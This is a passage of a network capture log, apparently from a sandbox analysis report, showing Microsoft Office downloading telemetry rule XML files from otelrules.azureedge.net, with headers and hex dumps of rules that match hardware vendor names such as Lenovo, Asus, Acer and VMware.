                                                                                                                                      2024-10-07 01:22:59 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      12192.168.2.44974413.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:22:59 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:22:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:22:59 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 415
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                      ETag: "0x8DC582B9F6F3512"
                                                                                                                                      x-ms-request-id: 1707b783-801e-00a3-53e5-167cfb000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012259Z-1657d5bbd48cpbzgkvtewk0wu000000002s000000000u89z
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:22:59 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      13192.168.2.44974913.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:22:59 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:22:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:22:59 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 486
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                      ETag: "0x8DC582BB344914B"
                                                                                                                                      x-ms-request-id: 0a3893d3-c01e-0082-33ee-16af72000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012259Z-1657d5bbd48jwrqbupe3ktsx9w00000002xg00000000prs4
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:22:59 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      14192.168.2.44975013.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:22:59 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:22:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:22:59 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 427
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                      ETag: "0x8DC582BA310DA18"
                                                                                                                                      x-ms-request-id: 915c1ee4-001e-0079-3000-1712e8000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012259Z-1657d5bbd48sdh4cyzadbb374800000002q0000000006ksw
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:22:59 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      15192.168.2.44974813.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:22:59 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:22:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:22:59 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 407
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                      ETag: "0x8DC582BBAD04B7B"
                                                                                                                                      x-ms-request-id: 789c8418-601e-0032-5905-17eebb000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012259Z-1657d5bbd48sdh4cyzadbb374800000002k000000000ns95
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:22:59 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      16192.168.2.44975113.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:22:59 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:22:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:22:59 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 486
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                      ETag: "0x8DC582B9018290B"
                                                                                                                                      x-ms-request-id: bf7deccb-401e-0064-0f0e-1754af000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012259Z-1657d5bbd48vhs7r2p1ky7cs5w000000035000000000571w
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:22:59 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      17192.168.2.44975213.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:22:59 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:22:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:22:59 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 407
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                      ETag: "0x8DC582B9698189B"
                                                                                                                                      x-ms-request-id: 99ffd5e0-b01e-0053-0101-17cdf8000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012259Z-1657d5bbd48tnj6wmberkg2xy800000002vg00000000e3nh
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:22:59 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      18192.168.2.44975413.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:00 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:00 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 415
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                      ETag: "0x8DC582BA41997E3"
                                                                                                                                      x-ms-request-id: 27ba9a72-001e-0046-2a01-17da4b000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012300Z-1657d5bbd487nf59mzf5b3gk8n00000002g0000000003kng
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:00 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      19192.168.2.44975513.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:00 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:00 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 477
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                      ETag: "0x8DC582BB8CEAC16"
                                                                                                                                      x-ms-request-id: c2d0a885-201e-0003-7ced-16f85a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012300Z-1657d5bbd482krtfgrg72dfbtn00000002m00000000063e3
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:00 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      20192.168.2.44975313.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:00 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:00 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 469
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                      ETag: "0x8DC582BBA701121"
                                                                                                                                      x-ms-request-id: e72ec3ca-501e-005b-2401-17d7f7000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012300Z-1657d5bbd48dfrdj7px744zp8s00000002eg00000000qu92
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:00 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      21192.168.2.44975613.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:00 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:00 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 464
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                      ETag: "0x8DC582B97FB6C3C"
                                                                                                                                      x-ms-request-id: 5a59384b-a01e-0053-3602-178603000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012300Z-1657d5bbd482lxwq1dp2t1zwkc00000002n0000000002fd7
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
